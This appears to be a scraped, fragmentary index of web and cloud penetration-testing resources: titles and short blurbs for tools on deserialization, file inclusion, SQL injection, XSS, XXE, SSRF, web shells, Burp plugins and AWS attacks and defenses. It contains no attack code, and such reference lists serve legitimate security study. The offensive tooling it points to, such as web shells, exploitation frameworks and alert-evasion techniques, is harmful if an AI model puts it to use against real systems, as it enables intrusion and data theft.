- JMET was released at Blackhat USA 2016 and is an outcome of Code White's research effort presented in the talk "Pwning Your Java Messaging With Deserialization Vulnerabilities". The goal of JMET is to make the exploitation of the Java Message Service (JMS) easy. In the talk more than 12 JMS client implementations where shown, vulnerable to deserialization attacks. The specific deserialization vulnerabilities were found in ObjectMessage implementations (classes implementing javax.jms.ObjectMessage).
- Break Fast Serial
- Exploits
- SerialKiller: Bypass Gadget Collection
- Collection of Bypass Gadgets that can be used in JVM Deserialization Gadget chains to bypass "Look-Ahead ObjectInputStreams" desfensive deserialization.
- Serianalyzer
- A static byte code analyzer for Java deserialization gadget research
- Java Deserialization Exploits
- A collection of Java Deserialization Exploits
- Java Deserialization Exploits
- A collection of curated Java Deserialization Exploits
- SerialKiller: Bypass Gadget Collection
- PHP
- Python
- 101
- Articles/Blogposts/Writeups
- Tools
- 101
- Articles/Papers/Writeups
- LFI with PHPINFO() Assistance - InsomniaSecurity 2011
- Turning LFI into RFI
- When configured in a specific way the web application would load the JAR file and search within the file for a class. Interestingly enough, in Java classes you can define a static block that is executed upon the class being processed
- Unrestricted File Upload Security Testing - Aptive
- LFI2RCE (Local File Inclusion to Remote Code Execution) advanced exploitation: /proc shortcuts
- This paper exposes the ability from the attacker standpoint to use /proc in order to exploit LFI (Local File Inclusion) vulnerabilities.
- Turning LFI to RFI
- Local file inclusion tricks
- Upgrade from LFI to RCE via PHP Sessions
- CVV #1: Local File Inclusion - SI9INT
- [Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems - @evisneffos]
- File Inclusion - nets.ec
- Cheat Sheets/Reference Lists
- Testing
- OWASP LFI
- LFI Local File Inclusion Techniques (paper)
- This paper exposes the ability from the attacker standpoint to use /proc in order to exploit LFI (Local File Inclusion) vulnerabilities. While using /proc for such aim is well known this one is a specific technique that was not been previously published as far as we know. A tool to automatically exploit LFI using the shown approach is released accordingly.
- Update: a third (known) technique has been dissected here
- Tools
- dotdotpwn
- Liffy
- Liffy is a Local File Inclusion Exploitation tool.
- lfi-labs
- small set of PHP scripts to practice exploiting LFI, RFI and CMD injection vulns
- psychoPATH - LFI
- This tool is a highly configurable payload generator detecting LFI & web root file uploads. Involves advanced path traversal evasive techniques, dynamic web root list generation, output encoding, site map-searching payload generator, LFI mode, nix & windows support plus single byte generator.
- Kadimus
- Kadimus is a tool to check sites to lfi vulnerability , and also exploit it
- lfipwn
- LFISuite
- 101
- General
- Reference
- Articles/Blogposts/Writeups
- Abusing NoSQL Databases - Ming Chow
- No SQL, No Injection? - Examining NoSQL Security
- NoSQL Injection in Modern Web Applications - petecorey.com
- Finding SQL injections fast with white-box analysis — a recent bug example - Frycos
- Blind (time-based) SQLi - Bug Bounty - jspin.re
- SELECT code_execution FROM * USING SQLite; Gaining code execution using a malicious SQLite database - Omer Gull
- Beyond SQLi: Obfuscate and Bypass - CWH Underground
- Tools
- sqlmap
- jSQL Injection
- jSQL Injection is a Java application for automatic SQL database injection.
- mongoaudit
- Laduanum
- “Laudanum is a collection of injectable files, designed to be used in a pentest when SQL injection flaws are found and are in multiple languages for different environments.They provide functionality such as shell, DNS query, LDAP retrieval and others.”
- GraFScaN
- Training
- SQLi Lab lessons
- SQLI-LABS is a platform to learn SQLI
- SQLi Lab lessons
- Writeups
- DB2
- MongoDB
- Intro to Hacking Mongo DB - SecuritySynapse
- Attacking MongoDB - ZeroNights2012
- MongoDB Injection - How To Hack MongoDB
- Hacking NodeJS and MongoDB - websecurify
- mongoaudit
- mongoaudit is a CLI tool for auditing MongoDB servers, detecting poor security settings and performing automated penetration testing.
- MS-SQL
- MySQL
- NoSQL
- Nosql-Exploitation-Framework
- A FrameWork For NoSQL Scanning and Exploitation Framework
- Making Mongo Cry Attacking NoSQL for Pen Testers Russell Butturini
- MongoDB: Typical Security Weaknesses in a NoSQL DB
- MongoDB Pentesting for Absolute Beginners
- Nosql-Exploitation-Framework
- PostgreSQL
- Oracle SQL
- "How I hacked PacketStorm" - rain forest puppy
- Albatar
- Albatar is a SQLi exploitation framework in Python
- 101
- Articles/Blogposts/Writeups
- Tools
- dotdotpwn
- It's a very flexible intelligent fuzzer to discover traversal directory vulnerabilities in software such as HTTP/FTP/TFTP servers, Web platforms such as CMSs, ERPs, Blogs, etc.
- dotdotpwn
- 101
- Articles/Blogposts/Writeups
- Prototype Pollution Affecting jquery package, versions <3.4.0 - snyk.io
- After three years of silence, a new jQuery prototype pollution vulnerability emerges once again - Liran Tal
- Prototype pollution attack (lodash) - holyvier
- Inheritance and the prototype chain - MozillaDevNetwork
- Prototype pollution attack through jQuery $.extend - Asger Feldthaus(HackerOne)
- Analysis and Exploitation of Prototype Pollution attacks on NodeJs - Nullcon HackIM CTF web 500 writeup - Anirudh Anand
- Prototype Pollution - Michal Bentkowski
- Exploiting prototype pollution – RCE in Kibana (CVE-2019-7609) - Michal Bentkowski
- Presentations, Talks, Videos
- Tools
- 101
- Articles/Blogposts/Writeups
- Tools
- Talks/Presentations/Videos
- Reflected File Download - A New Web Attack Vector - BHEU 2014
- Skip to 19:24 for technical content
- Paper
- Reflected File Download - A New Web Attack Vector - BHEU 2014
- 101
- Relative Path Overwrite Explanation/Writeup
- RPO (Relative Path Overwrite) is a technique to take advantage of relative URLs by overwriting their target file. To understand the technique we must first look into the differences between relative and absolute URLs. An absolute URL is basically the full URL for a destination address including the protocol and domain name whereas a relative URL doesn’t specify a domain or protocol and uses the existing destination to determine the protocol and domain.
- Relative Path Overwrite Explanation/Writeup
- Articles/Papers/Talks/Writeups
- General
- Tools
- Miscellaneous
- 101
- General
- AllThingsSSRF
- This is a collection of writeups, cheatsheets, videos, related to SSRF in one single location
- A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages
- Cracking the Lens: Targeting HTTP's Hidden Attack Surface
- AllThingsSSRF
- Presentations, Talks, Videos
- Writeups
- SSRF VS BUSINESS-CRITICAL APPLICATIONS PART 1: XXE TUNNELING IN SAP NET WEAVER - erpscan
- A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! - Orange Tsai - BH USA 17
- curl Based SSRF Exploits Against Redis
- Pivoting from blind SSRF to RCE with HashiCorp Consul
- How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE!
- Airbnb – Chaining Third-Party Open Redirect into Server-Side Request Forgery (SSRF) via LivePerson Chat - Brett Buerhaus
- Testing
- Tools
- General
- Testing
- General
- Server-Side Template Injection: RCE for the modern webapp
- Server-Side Template Injection
- Video
- This paper defines a methodology for detecting and exploiting template injection, and shows it being applied to craft RCE zerodays for two widely deployed enterprise web applications. Generic exploits are demonstrated for five of the most popular template engines, including escapes from sandboxes whose entire purpose is to handle user-supplied templates in a safe way.
- Purposefully Vulnerable Webapps
- Breakable Flask
- A simple vulnerable Flask application.
- Hackable
- A python flask app that is purposfully vulnerable to SQL injection and XSS Attacks
- Injecting Flask - Nvisium
- hackable - JasonHinds
- A python flask app that is purposfully vulnerable to SQL injection and XSS attacks
- Breakable Flask
- Writeups
- Tools
- tplmap
- Code and Server-Side Template Injection Detection and Exploitation Tool
- Templates Injections - PayloadsAllTheThings
- tplmap
- Exploiting Custom Template Engines - Dalton Campbell
- Articles
- Detection
- Case Study: How Backdoors Bypass Security Solutions with Advanced Camouflage Techniques
- Look at PHP obfuscation methods for webshells
- NeoPI
- What is NeoPI? NeoPI is a Python script that uses a variety of statistical methods to detect obfuscated and encrypted content within text/script files. The intended purpose of NeoPI is to aid in the detection of hidden web shell code. The development focus of NeoPI was creating a tool that could be used in conjunction with other established detection methods such as Linux Malware Detect or traditional signature/keyword based searches.
- Shell Detector
- Shell Detector – is a application that helps you find and identify php/cgi(perl)/asp/aspx shells. Shell Detector has a “web shells” signature database that helps to identify “web shell” up to 99%.
- Loki - Simple IOC Scanner
- Scanner for Simple Indicators of Compromise
- Case Study: How Backdoors Bypass Security Solutions with Advanced Camouflage Techniques
- Tools
- Weevely
- Weevely is a command line web shell dinamically extended over the network at runtime used for remote administration and pen testing. It provides a weaponized telnet-like console through a PHP script running on the target, even in restricted environments. The low footprint agent and over 30 modules shape an extensible framework to administrate, conduct a pen-test, post-exploit, and audit remote web accesses in order to escalate privileges and pivot deeper in the internal networks.
- Getting Started
- b374k shell 3.2
- This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel, connecting using ssh, ftp etc. All actions take place within a web browser
- Simple websockets based webshell
- JSShell
- An interactive multi-user web based JS shell written in Python with Flask (for server side) and of course Javascript and HTML (client side). It was initially created to debug remote esoteric browsers during tests and research. I'm aware of other purposes this tool might serve, use it at your own responsibility and risk.
- htshells
- Self contained web shells and other attacks via .htaccess files.
- Encoding Web Shells in PNG IDAT chunks - idontplaydarts.com
- Weevely
- 101
- Types of Cross-Site Scripting - OWASP
- Postcards from a Post-XSS World - Michael Zalewski
- This page is a rough collection of notes on some of the fundamental alternatives to direct script injection that would be available to attackers following the universal deployment of CSP or other security mechanisms designed to prevent the execution of unauthorized scripts. I hope to demonstrate that in many cases, the capabilities offered by these alternative methods are highly compatible with the goals of contemporary XSS attacks.
- ["Gimme a bit!" - Exploring Attacks in the "Post-XSS" World - Takashi Yoneuchi]
- Bypass Techniques/Writeups
- XSS bypass strtoupper & htmlspecialchars
- Is htmlspecialchars enough to prevent an SQL injection on a variable enclosed in single quotes? - StackOverflow
- XSS Web Filter Bypass list - rvrsh3ll
- XSS Filter Bypass List
- XSS without parentheses and semi-colons - Gareth Heyes
- Bypass XSS filters using JavaScript global variables - theMiddle
- Bypass XSS Protection with xmp, noscript, noframes.. etc.. - Hahwul
- Executing non-alphanumeric JavaScript without parenthesis - Gareth Heyes
- Non-alphanumeric code With JavaScript & PHP - Gareth Heyes
- CTF Challenge: INS Hack 2019 / Bypasses Everywhere -corb3nik
- DOM-based
- Presentations, Talks, Videos
- Self XSS: we’re not so different you and I - Mathias Karlsson
- Scriptless Attacks – Stealing the Pie Without Touching the Sill
- Due to their high practical impact, Cross-Site Scripting (XSS) attacks have attracted a lot of attention from the security community members. In the same way, a plethora of more or less effective defense techniques have been proposed, addressing the causes and effects of XSS vulnerabilities. As a result, an adversary often can no longer inject or even execute arbitrary scripting code in several real-life scenarios. In this paper, we examine the attack surface that remains after XSS and similar scripting attacks are supposedly mitigated by preventing an attacker from executing JavaScript code. We address the question of whether an attacker really needs JavaScript or similar functionality to perform attacks aiming for information theft. The surprising result is that an attacker can also abuse Cascading Style Sheets (CSS) in combination with other Web techniques like plain HTML, inactive SVG images or font files. Through several case studies, we introduce the so called scriptless attacks and demonstrate that an adversary might not need to execute code to preserve his ability to extract sensitive informati on from well protected websites. More precisely, we show that an attacker can use seemingly benign features to build side channel attacks that measure and exfiltrate almost arbitrar y data displayed on a given website. We conclude this paper with a discussion of potential mitigation techniques against this class of attacks. In addition, we have implemented a browser patch that enables a website to make a vital determination as to being loaded in a detached view or pop-up window. This approach proves useful for prevention of certain types of attacks we here discuss.
- Mutation XSS
- What is mutation XSS (mXSS)? - StackOverflow
- How mXSS attacks change everything we believed to know so far - Mario Heiderich - OWASP AppSec EU 2013
- mXSS - TheSpanner
- Exploiting the unexploitable with lesser known browser tricks - filedescriptor
- Running Your Instance of Burp Collaborator Server - blog.fabiopires.pt
- Piercing the Veil: Server Side Request Forgery to NIPRNet access
- Testing
- XSS Test String Dump
- HTML Purifier XSS Attacks Smoketest
- Cross-site scripting (XSS) cheat sheet - PortSwigger
- This cross-site scripting (XSS) cheat sheet contains many vectors that can help you bypass WAFs and filters. You can select vectors by the event, tag or browser and a proof of concept is included for every vector. This cheat sheet is regularly updated in 2019. Last updated: Fri, 08 Nov 2019
- Training
- XSS-Game.appspot
- Firing-Range
- Firing Range is a test bed for web application security scanners, providing synthetic, wide coverage for an array of vulnerabilities.
- XSSer
- prompt.ml - XSS Injection Game
- alert1 to win - XSS Injection Game
- Tools
- xsscrapy
- XSS Sniper
- Xenotix
- OWASP Xenotix XSS Exploit Framework is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework.
- xssValidator
- This is a burp intruder extender that is designed for automation and validation of XSS vulnerabilities.
- Shuriken
- Cross-Site Scripting (XSS) command line tool for testing lists of XSS payloads on web apps.
- XSStrike
- XSStrike is an advanced XSS detection and exploitation suite.
- iframeBusterXSS
- Check for know iframeBuster XSS
- Writeups
- Writing an XSS Worm
- XSS without HTML: Client-Side Template Injection with AngularJS
- XSS in AngularJS video series (walkthrough) - explaining some AngularJS sandbox bypasses, which resulted in the removal of the sandbox in 1.6
- Chaining Cache Poisoning To Stored XSS - Rohan Aggarwal
- Stealing JWTs in localStorage via XSS -David Roccasalva
- Penetration testing & window.opener — XSS vectors part 1 - Josh Graham
- A Questionable Journey From XSS to RCE - Dominik Penner
- Firefox uXSS and CSS XSS - leucosite.com
- Referer XSS with a Side of Link Injection - doyler.net
- XSS in steam react chat client - Zemmez
- [Cerberus FTP Blind Cross-Site Scripting to remote code execution as SYSTEM. (Version 9 and 10) - Kevin(secu.dk)]
- Winning Intigriti's XSS Challenge - Ryan Wise
- XSS in GMail’s AMP4Email via DOM Clobbering - Michal Bentkowski
- 101
- Articles/Papers/Talks/Writeups
- Tools
- Miscellaneous
- 101
- Articles/Papers/Talks/Writeups
- General
- Tools
- Puppeteer
- Puppeteer is a Node library which provides a high-level API to control Chrome or Chromium over the DevTools Protocol. Puppeteer runs headless by default, but can be configured to run full (non-headless) Chrome or Chromium.
- dvcs-ripper
- Rip web accessible (distributed) version control systems: SVN, GIT, Mercurial/hg, bzr, ... It can rip repositories even when directory browsing is turned off.
- Scrapy
- An open source and collaborative framework for extracting the data you need from websites.
- Puppeteer
- Miscellaneous
- WeasyPrint
- WeasyPrint is a visual rendering engine for HTML and CSS that can export to PDF. It aims to support web standards for printing. WeasyPrint is free software made available under a BSD license. BeautifulSoup
- WeasyPrint
- 101
- Tabnabbing: A New Type of Phishing Attack - Aza Raskin
- Reverse Tabnabbing - OWASP
- Reverse tabnabbing is an attack where a page linked from the target page is able to rewrite that page, for example to replace it with a phishing site. As the user was originally on the correct page they are less likely to notice that it has been changed to a phishing site, especially it the site looks the same as the target. If the user authenticates to this new page then their credentials (or other sensitive data) are sent to the phishing site rather than the legitimate one.
- Articles/Papers/Talks/Writeups
- Tools
- 101
- Articles/Blogposts/Writeups
- Papers
- Race Detection for Web Applications - Boris Petrov, Martin Vechev, Manu Sridharan, Julian Dolby
- We present the first formulation of a happens-before relation for common web platform features. Developing this relation was a non-trivial task, due to complex feature interactions and browser differences. We also present a logical memory access model for web applications that abstracts away browser implementation details. Based on the above, we implemented WEBRACER, the first dynamic race detector for web applications. WEBRACER is implemented atop the production-quality WebKit engine, enabling testing of full-featured web sites. WEBRACER can also simulate certain user actions, exposing more races. We evaluated WEBRACER by testing a large set of Fortune 100 company web sites. We discovered many harmful races, and also gained insights into how developers handle asynchrony in practice.
- Race Detection for Web Applications - Boris Petrov, Martin Vechev, Manu Sridharan, Julian Dolby
- Tools
- Requests-Racer
- Requests-Racer is a small Python library that lets you use the Requests library to submit multiple requests that will be processed by their destination servers at approximately the same time, even if the requests have different destinations or have payloads of different sizes. This can be helpful for detecting and exploiting race condition vulnerabilities in web applications. (For more information, see motivation.md.)
- Race the Web
- Tests for race conditions in web applications by sending out a user-specified number of requests to a target URL (or URLs) simultaneously, and then compares the responses from the server for uniqueness. Includes a number of configuration options.
- timing_attack
- Perform timing attacks against web applications
- Race condition exploit
- Tool to help with the exploitation of web application race conditions
- Requests-Racer
- Miscellaneous
- 101
- TLS Redirection (and Virtual Host Confusion) - GrrDog
- The goal of this document is to raise awareness of a little-known group of attacks, TLS redirection / Virtual Host Confusion, and to bring all the information related to this topic together.
- TLS Redirection (and Virtual Host Confusion) - GrrDog
- Articles/Papers/Talks/Writeups
- General
- Tools
- Miscellaneous
- 101
- Articles/Papers/Talks/Writeups
- Tools
- 101
- XXE (Xml eXternal Entity) attack(2002) - Gregory Steuck
- [XML Schema, DTD, and Entity Attacks A Compendium of Known Techniques - Timothy D. Morgan, Omar Al Ibrahim]
- Hunting in the Dark - Blind XXE
- Articles/Papers/Talks/Writeups
- Security Briefs - XML Denial of Service Attacks and Defenses(2009)
- Advice From A Researcher: Hunting XXE For Fun and Profit
- What You Didn't Know About XML External Entities Attacks
- Leading the Blind to Light! - A Chain to RCE
- What You Didn't Know About XML External Entities Attacks - Timothy D. Morgan
- Black Hat EU 2013 - XML Out-of-Band Data Retrieval
- Generic XXE Detection
- Playing with Content-Type – XXE on JSON Endpoints - NETSPI
- FileCry - The New Age of XXE - BH USA 2015
- XXE OOB exploitation at Java 1.7+ - 2014
- Security of applications that parse XML (supplementary) - 2009
- Exploiting XXE In File Upload Functionality
- XML Parser Evaluation - web-in-security.blogspot.de
- Hiding in Plain Sight: XXE Vulnerability in HP Project & Portfolio Mgmt Center - Benjamin Caudill
- Don’t open that XML: XXE to RCE in XML plugins for VS Code, Eclipse, Theia, … - thezero
- Playing with Content-Type – XXE on JSON Endpoints(2015) - Antti Rantasaari www.vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf
- Reference
- Tools
- XXEinjector
- XXEinjector automates retrieving files using direct and out of band methods. Directory listing only works in Java applications. Bruteforcing method needs to be used for other applications
- oxml_xxe
- This tool is meant to help test XXE vulnerabilities in file formats.
- XXEinjector
- Miscellaneous
- XML External Entity Injection in Jive-n (CVE-2018-5758) - Spencer Gietzen
- unindexed
- The site is constantly searching for itself in Google, over and over and over, 24 hours a day. The instant it finds itself in Google search results, the site will instantaneously and irrevocably securely delete itself. Visitors can contribute to the public content of the site, these contributions will also be destroyed when the site deletes itself.
COWL: A Confinement System for the Web * Robust JavaScript confinement system for modern web browsers. COWL introduces label-based mandatory access control to browsing contexts (pages, iframes, etc.) in a way that is fully backward-compatible with legacy web content. * Paper
- Tutorials/Tips/Stuff
- OWASP Top 10: Hacking Web Applications with Burp Suite - Chad Furman
- Burp Pro : Real-life tips and tricks
- Behind enemy lines: Bug hunting with Burp Infiltrator
- Automating Web Apps Input fuzzing via Burp Macros
- Developing Burp Suite Extensions - DOYENSEC
- Material for the training "Developing Burp Suite Extensions – From Manual Testing to Security Automation"
- Burp Suite Visual Aids - lanmaster53
- SSH "accept : too many open files" on OS X when using Burp - dewhurstsecurity.com
- Plugins
- Adapting Burp Extensions for Tailored Pentesting
- AuthMatrix
- AuthMatrix is a Burp Suite extension that provides a simple way to test authorization in web applications and web services.
- Autorize
- Autorize is an automatic authorization enforcement detection extension for Burp Suite. It was written in Python by Barak Tawily, an application security expert, and Federico Dotta, a security expert at Mediaservice.net. Autorize was designed to help security testers by performing automatic authorization tests. With the last release now Autorize also perform automatic authentication tests.
- Escalating Privileges like a Pro - Gaurav Narwani
- backslash-powered-scanner
- This extension complements Burp's active scanner by using a novel approach capable of finding and confirming both known and unknown classes of server-side injection vulnerabilities. Evolved from classic manual techniques, this approach reaps many of the benefits of manual testing including casual WAF evasion, a tiny network footprint, and flexibility in the face of input filtering.
- burp-rest-api
- A REST/JSON API to the Burp Suite security tool. Upon successfully building the project, an executable JAR file is created with the Burp Suite Professional JAR bundled in it. When the JAR is launched, it provides a REST/JSON endpoint to access the Scanner, Spider, Proxy and other features of the Burp Suite Professional security tool.
- BurpSmartBuster
- Looks for files, directories and file extensions based on current requests received by Burp Suite
- BurpKit
- BurpKit is a BurpSuite plugin which helps in assessing complex web apps that render the contents of their pages dynamically. It also provides a bi-directional Script bridge API which allows users to create quick one-off BurpSuite plugin prototypes which can interact directly with the DOM and Burp's extender API.
- BurpSmartBuster
- A Burp Suite content discovery plugin that add the smart into the Buster!
- collaborator-everywhere
- A Burp Suite Pro extension which augments your proxy traffic by injecting non-invasive headers designed to reveal backend systems by causing pingbacks to Burp Collaborator
- C02
- Co2 includes several useful enhancements bundled into a single Java-based Burp Extension. The extension has it's own configuration tab with multiple sub-tabs (for each Co2 module). Modules that interact with other Burp tools can be disabled from within the Co2 configuration tab, so there is no need to disable the entire extension when using just part of the functionality.
- distribute-damage
- Designed to make Burp evenly distribute load across multiple scanner targets, this extension introduces a per-host throttle, and a context menu to trigger scans from. It may also come in useful for avoiding detection.
- HUNT
- HUNT is a Burp Suite extension to: 1. Identify common parameters vulnerable to certain vulnerability classes; 2. Organize testing methodologies inside of Burp Suite;
- HUNT Burp Suite Extension
- HUNT Logo HUNT is a Burp Suite extension to: 1. Identify common parameters vulnerable to certain vulnerability classes. 2. Organize testing methodologies inside of Burp Suite.
- IntruderPayloads
- Office Open XML Editor - burp extension
- ParrotNG - burp plugin
- PwnBack
- Burp Extender plugin that generates a sitemap of a website using Wayback Machine
- SAML Raider
- SAML Raider is a Burp Suite extension for testing SAML infrastructures. It contains two core functionalities: Manipulating SAML Messages and manage X.509 certificates.
- swurg
- Parses Swagger files into the BurpSuite for automating RESTful API testing – approved by Burp for inclusion in their official BApp Store.
- Burp-molly-pack
- Burp-molly-pack is Yandex security checks pack for Burp. The main goal of Burp-molly-pack is to extend Burp checks. Plugins contains Active and Passive security checks.
- NoPE Proxy
- Non-HTTP Protocol Extension (NoPE) Proxy and DNS for Burp Suite.
- AutoRepeater
- Burp Suite is an intercepting HTTP Proxy, and it is the defacto tool for performing web application security testing. While Burp Suite is a very useful tool, using it to perform authorization testing is often a tedious effort involving a "change request and resend" loop, which can miss vulnerabilities and slow down testing. AutoRepeater, an open source Burp Suite extension, was developed to alleviate this effort. AutoRepeater automates and streamlines web application authorization testing, and provides security researchers with an easy-to-use tool for automatically duplicating, modifying, and resending requests within Burp Suite while quickly evaluating the differences in responses.
- Uniqueness plugin for Burp Suite
- Makes requests unique based on regular expressions. Handy for registration forms and any other endpoint that requires unique values upon every request.
- Bumpster
- The Unofficial Burp Extension for DNSDumpster.com. You simply supply a domain name and it returns a ton of DNS information and basically lays out the external network topology.
- J2EEScan
- J2EEScan is a plugin for Burp Suite Proxy. The goal of this plugin is to improve the test coverage during web application penetration tests on J2EE applications.
- JWT4B
- JSON Web Tokens (JWT) support for the Burp Interception Proxy. JWT4B will let you manipulate a JWT on the fly, automate common attacks against JWT and decode it for you in the proxy history. JWT4B automagically detects JWTs in the form of 'Authorization Bearer' headers as well as customizable post body parameters.
- Brida
- Brida is a Burp Suite Extension that, working as a bridge between Burp Suite and Frida, lets you use and manipulate applications’ own methods while tampering the traffic exchanged between the applications and their back-end services/servers. It supports all platforms supported by Frida (Windows, macOS, Linux, iOS, Android, and QNX)
- burp-suite-error-message-checks
- Burp Suite extension to passively scan for applications revealing server error messages
- Postman-Integration
- Postman Integration is an extension for burp to generate Postman collection fomat json file.
- Stepper
- Stepper is designed to be a natural evolution of Burp Suite's Repeater tool, providing the ability to create sequences of steps and define regular expressions to extract values from responses which can then be used in subsequent steps.
- LinkDumper Burp Plugin
- Extract (links/possible endpoints) from responses & filter them via decoding/sorting
- Cyber Security Transformation Chef
- The Cyber Security Transformation Chef (CSTC) is a Burp Suite extension. It is build for security experts to extend Burp Suite for chaining simple operations for each incomming or outgoing message. It can also be used to quickly make a special custom formatting for the message.
- jsonp
- jsonp is a Burp Extension which attempts to reveal JSONP functionality behind JSON endpoints. This could help reveal cross-site script inclusion vulnerabilities or aid in bypassing content security policies.
- Asset Discover
- Burp Suite extension to discover assets from HTTP response using passive scanning.
- Blogpost
- Dr. Watson
- Dr. Watson is a simple Burp Suite extension that helps find assets, keys, subdomains, IP addresses, and other useful information! It's your very own discovery side kick, the Dr. Watson to your Sherlock!
- Stepper
- Stepper is designed to be a natural evolution of Burp Suite's Repeater tool, providing the ability to create sequences of steps and define regular expressions to extract values from responses which can then be used in subsequent steps.
- BurpExtenderHeaderChecks
- Hackbar
- Hackbar plugin for Burp
- HTTPSmuggler
- A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques. This extension has been developed by Soroush Dalili (@irsdl) from NCC Group.
-
A Placement Vulnerability Study in Multi-Tenant Public Clouds
-
- One stop tool for auditing the security posture of AWS & GCP infrastructure.
-
Cloud Security Wiki - NotSoSecure
- Cloud Security Wiki is an initiative to provide all Cloud security related resources to Security Researchers and developers at one place.
-
"Serverless"
- Peeking Behind the Curtains of Serverless Platforms - Liang Wang, Mengyuan Li, Yinqian Zhang, Thomas Ristenpart, Michael Swift
- Taking on the viewpoint of a serverless customer, we conduct the largest measurement study to date, launching more than 50,000 function instances across these three services, in order to characterize their architectures, performance, and resource management efficiency. We explain how the platforms isolate the functions of different accounts, using either virtual machines or containers, which has important security implications. We characterize performance in terms of scalability, coldstart latency, and resource efficiency, with highlights including that AWS Lambda adopts a bin-packing-like strategy to maximize VM memory utilization, that severe contention between functions can arise in AWS and Azure, and that Google had bugs that allow customers to use resources for free.
- Peeking Behind the Curtains of Serverless Platforms - Liang Wang, Mengyuan Li, Yinqian Zhang, Thomas Ristenpart, Michael Swift
- 101
- Attacking
- AWS IAM Privilege Escalation – Methods and Mitigation – Part 2 - Spencer Gietzen
- Gone in 60 Milliseconds - Intrusion and Exfiltration in Server-less Architectures
- More and more businesses are moving away from monolithic servers and turning to event-driven microservices powered by cloud function providers like AWS Lambda. So, how do we hack in to a server that only exists for 60 milliseconds? This talk will show novel attack vectors using cloud event sources, exploitabilities in common server-less patterns and frameworks, abuse of undocumented features in AWS Lambda for persistent malware injection, identifying valuable targets for pilfering, and, of course, how to exfiltrate juicy data out of a secure Virtual Private Cloud.
- Step By Step AWS Cloud Hacking - Andres Riancho(SecTor19)
- Penetration Testing AWS Storage: Kicking the S3 Bucket
- AWS pwn
- This is a collection of horribly written scripts for performing various tasks related to penetration testing AWS. Please don't be sad if it doesn't work for you. It might be that AWS has changed since a given tool was written or it might be that the code sux. Either way, please feel free to contribute. Most of this junk was written by Daniel Grzelak but there's been plenty of contributions, most notably Mike Fuller.
- Pivoting in Amazon Clouds - Andres Riancho - BHUSA14
- "From no access at all, to the company Amazon's root account, this talk will teach attendees about the components used in cloud applications like: EC2, SQS, IAM, RDS, meta-data, user-data, Celery; and how misconfigurations in each can be abused to gain access to operating systems, database information, application source code, and Amazon's services through its API. The talk will follow a knowledgeable intruder from the first second after identifying a vulnerability in a cloud-deployed Web application and all the steps he takes to reach the root account for the Amazon user. Except for the initial vulnerability, a classic remote file included in a Web application which grants access to the front-end EC2 instance, all the other vulnerabilities and weaknesses exploited by this intruder are going to be cloud-specific.
- Paper
- Disrupting AWS logging - Daniel Grzelak
- Abusing AWS Metadata Service - Casey Goodrich
- Step by step AWS Cloud Hacking - Andres Riancho(SecTor19)
- Abusing the AWS metadata service using SSRF vulnerabilities - Christophe Tafani-Dereeper
- Bypass GuardDuty PenTest Alerts - Nick Frichette
- Getting shell and data access in AWS by chaining vulnerabilities - Riyaz Wilaker
- Account Jumping Post Infection Perstistency & Lateral Movement In AWS - Dan Amiga, Dor Knafo(BH-US16)
- Securing the Cloud: A Story of Research, Discovery, and Disclosure - Jordan Drysdale
- BHIS made some interesting discoveries while working with a customer to audit their Amazon Web Services (AWS) infrastructure. At the time of the discovery, we found two paths to ingress the customer’s virtual private cloud (VPC) through the elastic map reduce (EMR) application stacks. One of the vulns that gained us internal access was the Hadoop Unauthenticated RCE, which was patched by Apache a while back now. Another, and a bit more interesting entry point, was the HUE interface, which, by default, allows the creation of a new admin user for the web interface. Once in the web interface, HUE is similar to Jupyter in that it helps visualize code flow and operations. Here, you can create schedules that will send egress shells from the cluster worker nodes. Which, consequently, provides a window to a virtual private cloud network.
- General
- An Introduction to Penetration Testing AWS: Same Same, but Different - GracefulSecurity
- Using DNS to Break Out of Isolated Networks in a AWS Cloud Environment
- Customers can utilize AWS' DNS infrastructure in VPCs (enabled by default). Traffic destined to the AmazonProvidedDNS is traffic bound for AWS management infrastructure and does not egress via the same network links as standard customer traffic and is not evaluated by Security Groups. Using DNS exfiltration, it is possible to exfiltrate data out of an isolated network.
- IAM
- Lambda
- Mapping
- Cartography
- Cartography is a Python tool that consolidates infrastructure assets and the relationships between them in an intuitive graph view powered by a Neo4j database.
- Cartography
- S3
- Articles/Blogposts/Writeups
- Tools
- bucket-stream
- This tool simply listens to various certificate transparency logs (via certstream) and attempts to find public S3 buckets from permutations of the certificates domain name.
- AWSBucketDump
- Security Tool to Look For Interesting Files in S3 Buckets
- buckethead.py
- buckethead.py searches across every AWS region for a variety of bucket names based on a domain name, subdomains, affixes given and more. Currently the tool will only present to you whether or not the bucket exists or if they're listable. If the bucket is listable, then further interrogation of the resource can be done. It does not attempt download or upload permissions currently but could be added as a module in the future. You will need the awscli to run this tool as this is a python wrapper around this tool.
- slurp
- Enumerate S3 buckets via certstream, domain, or keywords
- Bucketlist
- Bucketlist is a quick project I threw together to find and crawl Amazon S3 buckets and put all the data into a PostgreSQL database for querying.
- Slurp
- Blackbox/whitebox S3 bucket enumerator
- bucket-stream
- Securing
- CIS Amazon Web Services Foundations
- asecure.cloud
- A free repository of customizable AWS security configurations and best practices
- AWS Security Primer
- CloudMapper
- CloudMapper generates network diagrams of Amazon Web Services (AWS) environments and displays them via your browser. It helps you understand visually what exists in your accounts and identify possible network misconfigurations.
- CloudTracker
- CloudTracker helps you find over-privileged IAM users and roles by comparing CloudTrail logs with current IAM policies.
- Blogpost
- Amazon Inspector
- Amazon Inspector is an automated security assessment service that helps improve the security and compliance of applications deployed on AWS. Amazon Inspector automatically assesses applications for vulnerabilities or deviations from best practices. After performing an assessment, Amazon Inspector produces a detailed list of security findings prioritized by level of severity. These findings can be reviewed directly or as part of detailed assessment reports which are available via the Amazon Inspector console or API.
- repokid
- AWS Least Privilege for Distributed, High-Velocity Deployment
- Tools
- Scout2
- Scout2 is a security tool that lets AWS administrators assess their environment's security posture. Using the AWS API, Scout2 gathers configuration data for manual inspection and highlights high-risk areas automatically. Rather than pouring through dozens of pages on the web, Scout2 supplies a clear view of the attack surface automatically.
- aws_pwn
